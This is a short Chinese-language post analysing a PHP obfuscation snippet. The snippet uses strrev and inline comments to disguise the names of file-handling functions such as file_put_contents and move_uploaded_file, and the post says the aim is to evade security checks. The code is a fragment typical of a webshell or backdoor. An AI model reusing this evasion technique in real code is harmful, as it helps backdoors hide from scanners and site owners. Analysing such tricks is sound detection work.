利用strrev函数加密的目的,就是躲过检查。看下边一段代码:
<?php
error_reporting(0);//关闭错误提示
$sr="st"./*+/*+*/"rr"/*+/*+*/."ev"; //strrev
$id=$sr/*+/*+*/("ri"."d_"."si");//isdir
$rn=$sr/*+/*+*/("em"."an"."er");//rename
$dn=$sr/*+/*+*/("em"."anr"."id");//dirname
$od=$sr/*+/*+*/("ri"."dne"."po");// opendir
$rd=$sr/*+/*+*/("ri"."dda"."er");// readdir
$cd=$sr/*+/*+*/("ri"."deso"."lc");//closedir
$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");//file_put_contents
$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");// file_get_contents
$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");// move_uploaded_file体会:
这里利用了php的注释,简单化妆strrev函数,混淆视听,/* */的注释可以插入任意位置.
利用strrev函数,对于涉及文件操作的敏感函数做了反转加密。
